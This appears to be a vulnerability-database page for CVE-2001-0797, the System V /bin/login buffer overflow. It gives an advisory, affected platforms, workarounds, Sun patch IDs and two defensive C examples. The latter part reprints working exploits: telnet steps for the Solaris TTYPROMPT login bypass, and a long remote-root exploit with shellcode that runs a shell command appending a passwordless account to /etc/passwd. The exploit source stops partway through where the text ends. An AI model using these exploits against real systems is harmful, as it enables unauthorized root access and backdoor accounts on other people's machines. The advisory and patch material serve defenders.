CVE-2001-0797
CVSS 10.0
Published: 2001-12-12 00:00:00
Revised: 2016-10-17 22:11:57

[Original text] Buffer overflow in login in various System V based operating systems allows remote attackers to execute arbitrary commands via a large number of arguments through services such as telnet and rlogin.


[CNNVD] System V login remote buffer overflow vulnerability (CNNVD-200112-095)

        
        Several applications use login to authenticate logins to the system. The System V derived login contains a remotely exploitable buffer overflow; an attacker can use it to obtain root privileges on the server.
        Some System V derived login implementations let the user pass specific arguments, such as environment variables, to the process. A number of buffers are used to hold these arguments, but the program's check on the number of arguments it accepts is flawed, so the buffer array can be overflowed.
        On most systems login is not set-uid, so it runs with the privileges of the user who invoked it. If the application that invokes login is set-uid (or set-gid) root, a local user can obtain root privileges. When an application with more privileges than the user, such as telnetd or rlogind, invokes login, the user can exploit this vulnerability to obtain that program's privileges; when that program is telnetd or rlogind, the user obtains root.
        Because in.telnetd and in.rlogind are offered as network services, a remote attacker with no local account can also use this vulnerability to obtain root on the system.
        An exploit has already been found and may be in circulation.
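The root cause described above is a missing count check on a fixed-size argument array. The following C program is an added example written for this page (it is not code from the page or from any vendor's login): it collects environment-style NAME=value arguments into a fixed-size array and rejects the whole request once the array is full, instead of writing past it. The limits MAX_ENV_ARGS and MAX_ENV_LEN, the function names and the sample inputs are all assumed or constructed for the example.

```c
/* Added example (not the page's or any vendor's code): a bounded collector for
 * the NAME=value arguments a System V style login accepts. CVE-2001-0797 came
 * from filling a fixed array of such entries without checking how many
 * arrived; this version counts them and refuses the request at the limit. */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define MAX_ENV_ARGS 32   /* capacity of the fixed array (assumed value) */
#define MAX_ENV_LEN  128  /* longest NAME=value entry accepted (assumed) */

/* Result codes returned by collect_env_args(). */
enum { ENV_OK = 0, ENV_TOO_MANY = -1, ENV_TOO_LONG = -2, ENV_MALFORMED = -3 };

/*
 * Split a space-separated string of NAME=value entries into out[0..max-1].
 * Stores the number of entries in *count and returns ENV_OK, or a negative
 * code if the input would exceed the array or contains a bad entry.
 * On error *count is the number of entries stored before the problem.
 */
int collect_env_args(const char *input, char out[][MAX_ENV_LEN], size_t max,
                     size_t *count)
{
    size_t n = 0;
    const char *p = input;

    while (*p) {
        while (*p == ' ' || *p == '\t') p++;   /* skip separators */
        if (!*p) break;

        const char *start = p;
        while (*p && *p != ' ' && *p != '\t') p++;
        size_t len = (size_t)(p - start);

        if (n >= max) {            /* the count check the vulnerable login lacked */
            *count = n;
            return ENV_TOO_MANY;
        }
        if (len >= MAX_ENV_LEN) {  /* leave room for the terminating NUL */
            *count = n;
            return ENV_TOO_LONG;
        }
        const char *eq = memchr(start, '=', len);
        if (eq == NULL || eq == start) {   /* require NAME=value, NAME non-empty */
            *count = n;
            return ENV_MALFORMED;
        }
        memcpy(out[n], start, len);
        out[n][len] = '\0';
        n++;
    }
    *count = n;
    return ENV_OK;
}

/* Build a constructed input of k entries "v0=x v1=x ..." for the self-check. */
static void make_input(char *buf, size_t bufsz, size_t k)
{
    size_t used = 0;
    buf[0] = '\0';
    for (size_t i = 0; i < k; i++) {
        int w = snprintf(buf + used, bufsz - used, "%sv%zu=x", i ? " " : "", i);
        if (w < 0 || (size_t)w >= bufsz - used) break;
        used += (size_t)w;
    }
}

/* Feed k constructed entries through the collector; returns the result code
 * and stores how many entries were accepted in *stored. */
int try_entries(size_t k, size_t *stored)
{
    char input[4096];
    char env[MAX_ENV_ARGS][MAX_ENV_LEN];
    make_input(input, sizeof input, k);
    return collect_env_args(input, env, MAX_ENV_ARGS, stored);
}

int main(void)
{
    size_t stored;
    int rc = try_entries(8, &stored);
    printf("8 entries: rc=%d stored=%zu\n", rc, stored);
    rc = try_entries(60, &stored);
    printf("60 entries: rc=%d stored=%zu (rejected, array not overrun)\n", rc, stored);
    return 0;
}
```

The point of the example is the order of the checks: capacity is tested before any byte is written, so an oversized request fails cleanly rather than corrupting whatever follows the array.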
        

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/o:sco:openserver:5.0.3
cpe:/o:sco:openserver:5.0.4
cpe:/o:sco:openserver:5.0.5
cpe:/o:sco:openserver:5.0.6
cpe:/o:sun:solaris:2.6::x86
cpe:/o:sun:solaris:8.0::x86
cpe:/o:sun:solaris:2.5::x86
cpe:/o:sun:solaris:7.0::x86
cpe:/o:sun:solaris:2.4::x86
cpe:/o:sco:openserver:5.0.1
cpe:/o:sco:openserver:5.0.2
cpe:/o:sgi:irix:3.3
cpe:/o:sun:solaris:2.5.1::ppc
cpe:/o:ibm:aix:4.3  IBM AIX 4.3
cpe:/o:ibm:aix:5.1  IBM AIX 5.1
cpe:/o:sun:solaris:2.5
cpe:/o:sun:solaris:7.0
cpe:/o:sun:solaris:2.4
cpe:/o:sun:solaris:2.1
cpe:/o:sun:solaris:2.6
cpe:/o:sun:solaris:8.0
cpe:/o:sun:solaris:2.3
cpe:/o:sun:solaris:2.5.1::x86
cpe:/o:sun:solaris:2.0
cpe:/o:hp:hp-ux:10.00  HP HP-UX 10.00
cpe:/o:hp:hp-ux:11.11  HP-UX 11.11
cpe:/o:sco:openserver:5.0
cpe:/o:sun:solaris:2.2
cpe:/o:hp:hp-ux:10.20  HP HP-UX 10.20
cpe:/o:hp:hp-ux:10.24  HP HP-UX 10.24
cpe:/o:ibm:aix:4.3.1  IBM AIX 4.3.1
cpe:/o:hp:hp-ux:10.01  HP HP-UX 10.01
cpe:/o:ibm:aix:4.3.2  IBM AIX 4.3.2
cpe:/o:sgi:irix:3.3.3
cpe:/o:sun:solaris:2.5.1
cpe:/o:sgi:irix:3.3.1
cpe:/o:sgi:irix:3.3.2
cpe:/o:sgi:irix:3.2
cpe:/o:sco:openserver:5.0.6a
cpe:/o:hp:hp-ux:10.10  HP HP-UX 10.10
cpe:/o:hp:hp-ux:11.00  HP-UX 11.00
cpe:/o:hp:hp-ux:11.0.4  HP HP-UX 11.0.4
cpe:/o:ibm:aix:4.3.3  IBM AIX 4.3.3

- OVAL (technical details for detection)

oval:org.mitre.oval:def:2025  System V login Buffer Overflow
*OVAL describes in detail how to detect this vulnerability; the related OVAL definition gives further technical details on detecting it.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0797
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0797
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200112-095
(official data source) CNNVD

- Other links and resources

ftp://patches.sgi.com/support/free/security/advisories/20011201-01-I
(UNKNOWN)  SGI  20011201-01-I
ftp://stage.caldera.com/pub/security/openserver/CSSA-2001-SCO.40/CSSA-2001-SCO.40.txt
(UNKNOWN)  CALDERA  CSSA-2001-SCO.40
http://marc.info/?l=bugtraq&m=100844757228307&w=2
(UNKNOWN)  BUGTRAQ  20011214 Sun Solaris login bug patches out
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/213
(UNKNOWN)  SUN  00213
http://www-1.ibm.com/support/search.wss?rs=0&q=IY26221&apar=only
(UNKNOWN)  AIXAPAR  IY26221
http://www.cert.org/advisories/CA-2001-34.html
(VENDOR_ADVISORY)  CERT  CA-2001-34
http://www.kb.cert.org/vuls/id/569272
(UNKNOWN)  CERT-VN  VU#569272
http://www.securityfocus.com/archive/1/246487
(VENDOR_ADVISORY)  BUGTRAQ  20011219 Linux distributions and /bin/login overflow
http://www.securityfocus.com/bid/3681
(VENDOR_ADVISORY)  BID  3681
http://xforce.iss.net/alerts/advise105.php
(VENDOR_ADVISORY)  ISS  20011212 Buffer Overflow in /bin/login
http://xforce.iss.net/static/7284.php
(VENDOR_ADVISORY)  XF  telnet-tab-bo(7284)

- Vulnerability information

System V login remote buffer overflow vulnerability
Critical    Boundary condition error
2001-12-12 00:00:00 2005-08-17 00:00:00
Remote

- Advisories and patches

        Temporary workaround:
        If you cannot install the patch or upgrade right away, CNNVD recommends the following measures to reduce the threat:
        * Immediately stop telnet, rlogin and any other service that uses login for authentication.
         If you are running OpenSSH with the "UseLogin" option enabled, edit the server configuration file and set every `UseLogin' directive to `UseLogin no'.
        
        * Switch to a more secure remote-access tool such as SSH or OpenSSH.
         SSH:
        http://www.ssh.com

         OpenSSH:
        http://www.openssh.org

        * If you cannot disable the telnet/rlogin services, use TCP wrappers, a firewall or packet filtering to deny untrusted IP addresses access to port 23/TCP (telnet) and port 513/TCP (rlogin).
        Vendor patches:
        Caldera
        -------
        Caldera has released a security advisory (CSSA-2001-SCO.40) for this issue:
        
        http://stage.caldera.com/support/security/

        
        Binary patches for SCO OpenServer have also been released:
         SCO OpenServer 5.0.5 and earlier: erg711877.505.tar.Z
         SCO OpenServer 5.0.6: erg711877.506.tar.Z
        
        These patches can be downloaded from the following directory:
        ftp://stage.caldera.com/pub/security/openserver/CSSA-2001-SCO.40/
        HP
        --
        HP-UX cannot be attacked through this issue, although HP-UX does contain the buffer overflow; HP has since fixed the overflow.
        IBM
        ---
        IBM AIX versions 4.3 and 5.1 are affected. IBM has provided an emergency fix (efix), "tsmlogin_efix.tar.Z", which can be downloaded from:
        ftp://aix.software.ibm.com/aix/efixes/security
        The AIX 5.1 fix number is IY26221 and it will be released shortly. No fix number has been assigned for AIX 4.3 yet, because a new 4.3 release is forthcoming. Once the official fixes are released, the "README" file on the FTP site will be updated with fix details and download locations.
        SGI
        ---
        SGI's investigation found that only IRIX 3.x has this vulnerability; other IRIX versions (including 4.x, 5.x and 6.x) are not affected. You should upgrade to the latest IRIX release as soon as possible.
        Sun
        ---
        Sun has provided patches that fix this vulnerability.
        
        Patch IDs:
         OS Version       Patch ID
         __________       _________
         SunOS 5.8        111085-02
         SunOS 5.8_x86    111086-02
         SunOS 5.7        112300-01
         SunOS 5.7_x86    112301-01
         SunOS 5.6        105665-04
         SunOS 5.6_x86    105666-04
         SunOS 5.5.1      106160-02
         SunOS 5.5.1_x86  106161-02
        You can download the corresponding patch with the following link:
        
        http://sunsolve.sun.com/pub-cgi/patchDownload.pl?target=<patch ID>&method=h

        For example, for patch 111085-02 use the following link:
        
        http://sunsolve.sun.com/pub-cgi/patchDownload.pl?target=111085&method=h
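To check a Solaris host against the Sun patch table above, the following C program is an added example (not from Sun, CNNVD or this page's authors): it parses the text of `showrev -p` and reports whether the minimum revision listed for a given OS version is installed. It relies only on the `Patch: NNNNNN-RR` prefix of each line; the sample listing embedded in it is constructed rather than captured from a real host, and the function names are my own.

```c
/* Added example (not the page's, Sun's or CNNVD's code): compare a saved
 * `showrev -p` listing with the login patch revisions named in the advisory. */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/* Patch IDs from the Sun table on this page: base number and minimum revision. */
struct required_patch { const char *os; const char *base; int min_rev; };

static const struct required_patch REQUIRED[] = {
    { "SunOS 5.8",       "111085", 2 },
    { "SunOS 5.8_x86",   "111086", 2 },
    { "SunOS 5.7",       "112300", 1 },
    { "SunOS 5.7_x86",   "112301", 1 },
    { "SunOS 5.6",       "105665", 4 },
    { "SunOS 5.6_x86",   "105666", 4 },
    { "SunOS 5.5.1",     "106160", 2 },
    { "SunOS 5.5.1_x86", "106161", 2 },
};

/*
 * Return the highest installed revision of patch `base` found in `showrev`
 * (the text of `showrev -p`, one "Patch: NNNNNN-RR ..." line per patch),
 * or -1 if the patch is not listed at all.
 */
int highest_installed_rev(const char *showrev, const char *base)
{
    int best = -1;
    const char *p = showrev;
    char wanted[32];
    snprintf(wanted, sizeof wanted, "Patch: %s-", base);

    while ((p = strstr(p, wanted)) != NULL) {
        /* only accept a match at the start of a line */
        if (p == showrev || p[-1] == '\n') {
            int rev = atoi(p + strlen(wanted));
            if (rev > best) best = rev;
        }
        p += strlen(wanted);
    }
    return best;
}

/*
 * Look up the requirement for `os` (e.g. "SunOS 5.8") and report:
 *   1  the required revision (or a newer one) is installed
 *   0  the patch is missing or too old
 *  -1  `os` is not in the advisory table
 */
int login_patch_status(const char *os, const char *showrev)
{
    for (size_t i = 0; i < sizeof REQUIRED / sizeof REQUIRED[0]; i++) {
        if (strcmp(REQUIRED[i].os, os) == 0) {
            int rev = highest_installed_rev(showrev, REQUIRED[i].base);
            return rev >= REQUIRED[i].min_rev ? 1 : 0;
        }
    }
    return -1;
}

/* Constructed sample listing: an old revision of 111085 plus the fixed one. */
static const char SAMPLE_SHOWREV[] =
    "Patch: 108528-13 Obsoletes:  Requires:  Incompatibles:  Packages: SUNWcsu\n"
    "Patch: 111085-01 Obsoletes:  Requires:  Incompatibles:  Packages: SUNWcsu\n"
    "Patch: 111085-02 Obsoletes:  Requires:  Incompatibles:  Packages: SUNWcsu\n";

int main(void)
{
    int st = login_patch_status("SunOS 5.8", SAMPLE_SHOWREV);
    printf("SunOS 5.8: %s\n", st == 1 ? "login patch present" :
                               st == 0 ? "MISSING login patch" : "not in table");
    return 0;
}
```

On a live host the listing would come from `showrev -p` output saved to a file; the check takes the highest revision present, so an older revision left beside the current one does not cause a false negative.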

- Vulnerability information (57)

Solaris 2.6/7/8 (TTYPROMPT in.telnet) Remote Authentication Bypass (EDBID:57)
solaris remote
2002-11-02 Verified
0 Jonathan S.
N/A [click to download]
Solaris TTYPROMPT Security Vulnerability (Telnet)

This vulnerability is very simple to exploit, since it does not require 
any code to be compiled by an attacker. The vulnerability only requires 
the attacker to simply define the environment variable TTYPROMPT to a 
6-character string, inside telnet. Jonathan believes this overflows an 
integer inside login, which specifies whether the user has been 
authenticated (just a guess).

Once connected to the remote host, you must type the username, followed 
by 64 " c"s, and a literal "\n". You will then be logged in as the user 
without any password authentication. This should work with any account 
except root (unless remote root login is allowed). 

Example: 
coma% telnet 
telnet> environ define TTYPROMPT abcdef 
telnet> o localhost 

SunOS 5.8 

bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n 
Last login: whenever 
$ whoami bin 

# milw0rm.com [2002-11-02]
		

- Vulnerability information (346)

Solaris /bin/login Remote Root Exploit (SPARC/x86) (EDBID:346)
linux remote
2001-12-20 Verified
23 Teso
N/A [click to download]
/*
 * 7350963 - /bin/login remote root exploit SPARC/x86
 *
 * TESO CONFIDENTIAL - SOURCE MATERIALS
 *
 * This is unpublished proprietary source code of TESO Security.
 *
 * (C) COPYRIGHT TESO Security, 2001
 * All Rights Reserved
 *
 * bug found by scut 2001/12/20
 * thanks to halvar,scut,typo,random,edi,xdr.
 * special thanks to security.is.
 *
 * keep it private!
 * don't distribute!
 */

//#define X86_FULL_PACKAGE

#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>

void usage()
{
  printf("usage: ./7350963 ip_of_the_victim\n");
}

void dump_hex(char *str,char *data,int len)
{
  int i;
  if(str)
    {
      printf("\n=======%s:%d========\n",str,len);
    }
  else
    {
      printf("\n=======================\n");
    }
  for(i=0; i < len ;i++)
    {
      printf("x%.2x\n", (data[i]&0xff));
    }
  printf("\n-----------------------\n");
  for(i=0; i < len ;i++)
    {
      if(data[i]==0x00)
	{
	  printf("|\n");
	}
      else
	{
	  printf("%c\n",data[i]);
	}
    }
  printf("\n");
  fflush(stdout);
}

int send_data(int sock,const char *send_data,int send_len)
{
  int wc;
  int rc;
  char recv_buf[1000];
  
  if(send_data && send_len > 0)
    {
      wc=send(sock,send_data,send_len,0);
    }
  rc=recv(sock,recv_buf,sizeof(recv_buf),0);
  
  if(rc > 0)
    {
      dump_hex("recv",recv_buf,rc);
    }
}

int main(int argc,char *argv[])
{
  int sock;
  struct sockaddr_in address;
  int i;
  
  char send_data_1[]=
  {
    0xff,0xfd,0x03,
    0xff,0xfb,0x18,
    0xff,0xfb,0x1f,
    0xff,0xfb,0x20,
    0xff,0xfb,0x21,
    0xff,0xfb,0x22,
    0xff,0xfb,0x27,
    0xff,0xfd,0x05,
    0xff,0xfb,0x23
  };
  char send_data_2[]=
  {
    0xff,0xfa,0x1f,0x00,0x50,0x00,0x18,
    0xff,0xf0,
    0xff,0xfc,0x24
  };
  char send_data_3[]=
  {
    0xff,0xfd,0x01,
    0xff,0xfc,0x01
  };
  
  char str_buffer[1024*30];
  int str_buffer_pos=0;
  char str_end[2]={0xd,0x0};
  
  char *env_str;
  int env_str_len;
  char env_1[4]={0xff,0xfa,0x18,0x00};
  char *terminal_name="xterm-debian";
  char env_2[6]={0xff,0xf0,0xff,0xfa,0x23,0x00};
  char *display="matter:0.0";
  char env_3[7]={0xff,0xf0,0xff,0xfa,0x27,0x00,0x00};
  char *display_var="DISPlAY";
  char display_delimiter[1]={0x01};
  char *display_value="matter:0.0";
  char *environ_str;
  int environ_str_len;
  int env_cur_pos=0;
  int env_num;
  
  char env_4[2]={0xff,0xf0};
  char  exploit_buffer[]="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\\r\n";
  char login_buffer[]=  "ji1=A ji2=A ji3=A ji4=A ji5=A ji6=A ji7=A ji8=A ji9=Z ji10=z\\\r\n\
                         ji11=B ji12=A ji13=A ji14=b ji15=A ji16=A ji17=A ji18=A ji19=B ji20=b\\\r\n\
                         ji21=C ji22=A ji23=A ji24=c ji25=A ji26=A ji27=A ji28=A ji29=C ji30=c\\\r\n\
                         ji32=D ji32=A ji33=A ji34=d ji35=A ji36=A ji37=A ji38=A ji39=D ji40=d\\\r\n\
                         ji41=E ji42=A ji43=A ji44=e j";
  char realfree_edx[]={0x83,0x83,0x83,0x83}; //0xdf9d6361 <realfree+81>: test   $0x1,%dl  (value chosen to get past this test)
  char login_buffer1[]="=A j";
  
#ifdef X86_FULL_PACKAGE
  char t_delete_edi_plus_0x8[]={0x2f,0x80,0x06,0x08};
#else
  char t_delete_edi_plus_0x8[]={0x27,0x80,0x06,0x08};
#endif
  char t_delete_edi_plus_0xa[]="=A j";
  char t_delete_edi_plus_0x10[]={0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff};
  char login_buffer1_0[]="=A ji48=A j ";
#ifdef X86_FULL_PACKAGE
  char t_delete_edi_plus_0x20[]={0xf0,0x55,0x6,0x08};
#else
  char t_delete_edi_plus_0x20[]={0xe8,0x55,0x6,0x08};
#endif
  char login_buffer1_1[]="=\\\r\n\ji51=F ji52=A ji53=A ji54=f ji55=A ji56=A j=iheol i58=";
#ifdef X86_FULL_PACKAGE
  char t_delete2_param1[]={0x29,0x80,0x06,0x08};
#else
  char t_delete2_param1[]={0x21,0x80,0x06,0x08};
#endif
  char login_buffer1_2[]="6=8";
  char link_pos[]={0x97,0xff,0xff,0xff,0xff,0xff,0xff};
  //the first A is -1
  char login_buffer2[]="A=AB";
  //    0x080654d4->0x080656ac at 0x000054d4: .got ALLOC LOAD DATA HAS_CONTENTS
  //0x80655a4 <_GLOBAL_OFFSET_TABLE_+208>:  0xdf9bd0b8 <strncpy>
  //(gdb) print/x 0x80655a4 - 0x20
  //$1 = 0x8065584
#ifdef X86_FULL_PACKAGE
  char t_delete2_edi_plus_0x8[]={0x90,0x55,0x06,0x08}; //strncpy-0x20,ecx
#else
  char t_delete2_edi_plus_0x8[]={0x84,0x55,0x06,0x08}; //strncpy-0x20,ecx
#endif
  char login_buffer2_0[]="GHIJ";
  char t_delete2_edi_plus_0x10[]={0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff};
  char login_buffer2_1[]="OPQRSTUVWXYZ";
  
  //0x806810d <inputline+780>:       'A' <repeats 82 times>, "\n"
#ifdef X86_FULL_PACKAGE
  char t_delete2_edi_plus_0x20[]={0x06,0x81,0x06,0x08}; //shellcode,eax
#else
  char t_delete2_edi_plus_0x20[]={0xfe,0x80,0x06,0x08}; //shellcode,eax
#endif
  
  //0x8067e01 <inputline>: "heowahfoihewobhfoiewhiofhoewhofhoeiwhofwhofhiewwhfoiew
  char login_buffer2_2[]="efghijklmnopqrstuvwxyz0123456789A\\\r\n\
    jk11=A jm21=C nj31=A jo41=A pi51=A jq61=A jr71=A js81=g jt91=A ju01=A jv11=A 
    jw21=B jy"; //31=A z";//4=A k2=A k3=A k";
  
#ifdef X86_FULL_PACKAGE
  //char strncpy_src[]={0xf9,0x3b,0x05,0x08};
  char strncpy_src[]={0x31,0x80,0x06,0x08};
  
#else
  char strncpy_src[]={0xf1,0x3b,0x05,0x08};
  
#endif
  
  char env_buffer[]="hi1=A hi2=A hi3=A hi";
  char pam_input_output_eax[]={0x48,0x8a,0x06,0x08}; //0x8068a48
  char env_buffer0[]="hi5=A hi6=A hi7=A hi";
  
#ifdef X86_FULL_PACKAGE
  char free_dest_buffer[]={0x31,0x80,0x06,0x08};
  
#else
  char free_dest_buffer[]={0x29,0x80,0x06,0x08};
#endif
  
  char env_buffer2[]="zi9=";
#ifdef X86_FULL_PACKAGE
  char free_dest_buffer2[]={0x31,0x80,0x06,0x08};
  
#else
  char free_dest_buffer2[]={0x29,0x80,0x06,0x08};
  
#endif
  
  char exp_buffer0[]="hello";
  char jmp_code[]={0xeb,0xc};
  char exp_buffer1[]="\\\r\nhhhhhhhhhhh";
  char shellcode[]=
  {
    0xeb,0x1d,
    0x5e,           /*popl   %esi*/
    0x33,0xc0,       /*xorl   %eax,%eax*/
    0x50,           /*pushl  %eax - ,0x0*/
#ifdef X86_FULL_PACKAGE
    0x68,0x46,0x81,0x06,0x08,
    0x68,0x43,0x81,0x06,0x08,
    0x68,0x40,0x81,0x06,0x08,
    0x68,0x38,0x81,0x06,0x08,
#else
    0x68,0x3e,0x81,0x06,0x08,
    0x68,0x3b,0x81,0x06,0x08,
    0x68,0x38,0x81,0x06,0x08,
    0x68,0x30,0x81,0x06,0x08,
#endif
#ifdef X86_FULL_PACKAGE
    0xe8,0x25,0xa0,0xfe,0xff,0xff, /*call execve: 0xfffe9fee*/
#else
    0xe8,0x2e,0xa0,0xfe,0xff,0xff, /*call execve: 0xfffe9fee*/
#endif
    0xe8,0xde,0xff,0xff,0xff,0xff,0xff,0xff /*call again*/
  };
  char exec_argv0[]="/bin/sh";
  char exec_argv1[]="sh";
  char exec_argv2[]="-c";
  char exec_argv3[]="/bin/echo met::463:1::/:/bin/sh>>/etc/passwd;";
  //"/bin/echo met::11652::::::>>/etc/shadow;";
  //"/bin/finger @210.111.69.137";
  //211.59.123.155";
  char extra_buffer[]="hihihiifhewiohfiowehfiohweiofhiowehfoihefe\\\r\n";
#ifdef X86_FULL_PACKAGE
  char free_dest_buffer3[]={0x31,0x80,0x06,0x08};
#else
  char free_dest_buffer3[]={0x29,0x80,0x06,0x08};
#endif
  char env_buffer5[]="70=b \\\r\n\hr371=b hs372=";
  char pam_input_output_eax2[]={0xf5,0x3b,0x05,0x08};
  char env_buffer5_0[]="473=";
  char pam_get_authtok_eax[]={0xf6,0x3b,0x05,0x08}; //0x8053bfa temporary workaround
  char pam_get_data_esi[]={0xa8,0xb1,0x06,0x08};//0x806b1a8  display="";  terminal_name="";
  
  if (argc < 2)
    {
      usage();
      exit(-1);
    }
  
  env_str_len= sizeof(env_1) + strlen(terminal_name) + sizeof(env_2)+strlen(display) + sizeof(env_3) + strlen(display_var) + sizeof(display_delimiter) + strlen(display_value) + sizeof(env_4);
  
  env_str=(char *)calloc(1,env_str_len);
  if(env_str)
    {
      env_cur_pos=0;
      memcpy(env_str+env_cur_pos,env_1,sizeof(env_1));
      env_cur_pos += sizeof(env_1);
      memcpy(env_str + env_cur_pos,terminal_name,strlen(terminal_name));
      env_cur_pos += strlen(terminal_name);
      memcpy(env_str + env_cur_pos,env_2,sizeof(env_2));
      env_cur_pos += sizeof(env_2);
      memcpy(env_str + env_cur_pos,display,strlen(display));
      env_cur_pos += strlen(display);
      memcpy(env_str + env_cur_pos,env_3,sizeof(env_3));
      env_cur_pos += sizeof(env_3);
      memcpy(env_str + env_cur_pos,display_var,strlen(display_var));
      env_cur_pos += strlen(display_var);
      memcpy(env_str + env_cur_pos,display_delimiter,sizeof(display_delimiter));
      env_cur_pos+=sizeof(display_delimiter);
      memcpy(env_str + env_cur_pos,display_value,strlen(display_value));
      env_cur_pos += strlen(display_value);
      memcpy(env_str + env_cur_pos,env_4,sizeof(env_4));
      env_cur_pos += sizeof(env_4);
    }
  
  /*socket operation*/
  sock=socket(AF_INET,SOCK_STREAM,0);
  if(sock < 0)
    {
      perror("socket");
      return -1;
    }
  address.sin_family=AF_INET;
  address.sin_port=htons(23);
  //inet_pton(AF_INET,argv[1],&address.sin_addr); //on some system no inet_pton exists
  address.sin_addr.s_addr=inet_addr(argv[1]);
  
  if(connect(sock,(struct sockaddr *)&address,sizeof(address))<0)
    {
      perror("connect");
      return -1;
    }
  send_data(sock,NULL,0);
  send_data(sock,send_data_1,sizeof(send_data_1));
  send_data(sock,send_data_2,sizeof(send_data_2));
  
  //dump_hex("env",env_str,env_cur_pos);
  send_data(sock,env_str,env_cur_pos);
  free(env_str);
  
  send_data(sock,send_data_3,sizeof(send_data_3));
  
  str_buffer_pos=0;
  
  memcpy(str_buffer + str_buffer_pos,exploit_buffer,strlen(exploit_buffer));
  str_buffer_pos += strlen(exploit_buffer);
  
  strcpy(str_buffer + str_buffer_pos,login_buffer);
  str_buffer_pos += strlen(login_buffer);
  
  memcpy(str_buffer + str_buffer_pos,realfree_edx,sizeof(realfree_edx));
  str_buffer_pos += sizeof(realfree_edx);
  
  strcpy(str_buffer + str_buffer_pos,login_buffer1);
  str_buffer_pos += strlen(login_buffer1);
  
  memcpy(str_buffer + str_buffer_pos,t_delete_edi_plus_0x8,sizeof(t_delete_edi_plus_0x8));
  str_buffer_pos += sizeof(t_delete_edi_plus_0x8);
  
  memcpy(str_buffer + str_buffer_pos,t_delete_edi_plus_0xa,strlen(t_delete_edi_plus_0xa));
  str_buffer_pos += strlen(t_delete_edi_plus_0xa);
  
  memcpy(str_buffer + str_buffer_pos,t_delete_edi_plus_0x10,sizeof(t_delete_edi_plus_0x10));
  str_buffer_pos += sizeof(t_delete_edi_plus_0x10);
  
  strcpy(str_buffer + str_buffer_pos,login_buffer1_0);
  str_buffer_pos += strlen(login_buffer1_0);
  
  memcpy(str_buffer + str_buffer_pos,t_delete_edi_plus_0x20,sizeof(t_delete_edi_plus_0x20));
  str_buffer_pos += sizeof(t_delete_edi_plus_0x20);
  
  strcpy(str_buffer + str_buffer_pos,login_buffer1_1);
  str_buffer_pos += strlen(login_buffer1_1);
  
  memcpy(str_buffer + str_buffer_pos,t_delete2_param1,sizeof(t_delete2_param1));
  str_buffer_pos += sizeof(t_delete2_param1);
  
  strcpy(str_buffer + str_buffer_pos,login_buffer1_2);
  str_buffer_pos += strlen(login_buffer1_2);
  
  memcpy(str_buffer + str_buffer_pos,link_pos,sizeof(link_pos));
  str_buffer_pos += sizeof(link_pos);
  
  strcpy(str_buffer + str_buffer_pos,login_buffer2);
  str_buffer_pos += strlen(login_buffer2);
  
  memcpy(str_buffer + str_buffer_pos,t_delete2_edi_plus_0x8,sizeof(t_delete2_edi_plus_0x8));
  str_buffer_pos += sizeof(t_delete2_edi_plus_0x8);
  
  strcpy(str_buffer + str_buffer_pos,login_buffer2_0);
  str_buffer_pos += strlen(login_buffer2_0);
  
  memcpy(str_buffer + str_buffer_pos,t_delete2_edi_plus_0x10,sizeof(t_delete2_edi_plus_0x10));
  str_buffer_pos += sizeof(t_delete2_edi_plus_0x10);
  
  strcpy(str_buffer + str_buffer_pos,login_buffer2_1);
  str_buffer_pos += strlen(login_buffer2_1);
  
  memcpy(str_buffer + str_buffer_pos,t_delete2_edi_plus_0x20,sizeof(t_delete2_edi_plus_0x20));
  str_buffer_pos +=  sizeof(t_delete2_edi_plus_0x20);
  
  strcpy(str_buffer + str_buffer_pos,login_buffer2_2);
  str_buffer_pos += strlen(login_buffer2_2);
  
  memcpy(str_buffer + str_buffer_pos,strncpy_src,sizeof(strncpy_src));
  str_buffer_pos += sizeof(strncpy_src);
  
  memcpy(str_buffer + str_buffer_pos,env_buffer,strlen(env_buffer));
  str_buffer_pos += strlen(env_buffer);
  
  memcpy(str_buffer + str_buffer_pos,pam_input_output_eax,sizeof(pam_input_output_eax));
  str_buffer_pos += sizeof(pam_input_output_eax);
  
  memcpy(str_buffer + str_buffer_pos,env_buffer,strlen(env_buffer0));
  str_buffer_pos += strlen(env_buffer0);
  
  memcpy(str_buffer + str_buffer_pos,free_dest_buffer,sizeof(free_dest_buffer));
  str_buffer_pos += sizeof(free_dest_buffer);
  
  memcpy(str_buffer + str_buffer_pos,env_buffer2,strlen(env_buffer2));
  str_buffer_pos += strlen(env_buffer2);
  
  memcpy(str_buffer + str_buffer_pos,free_dest_buffer2,sizeof(free_dest_buffer2));
  str_buffer_pos += sizeof(free_dest_buffer2);
  
  strcpy(str_buffer + str_buffer_pos,exp_buffer0);
  str_buffer_pos    += strlen(exp_buffer0);
  
  memcpy(str_buffer + str_buffer_pos,jmp_code,sizeof(jmp_code));
  str_buffer_pos    += sizeof(jmp_code);
  
  strcpy(str_buffer + str_buffer_pos,exp_buffer1);
  str_buffer_pos    += strlen(exp_buffer1);
  
  memcpy(str_buffer + str_buffer_pos,shellcode,sizeof(shellcode));
  str_buffer_pos    += sizeof(shellcode);
  
  strcpy(str_buffer + str_buffer_pos,exec_argv0);
  str_buffer_pos    += strlen(exec_argv0)+1;
  
  strcpy(str_buffer + str_buffer_pos,exec_argv1);
  str_buffer_pos    += strlen(exec_argv1)+1;
  
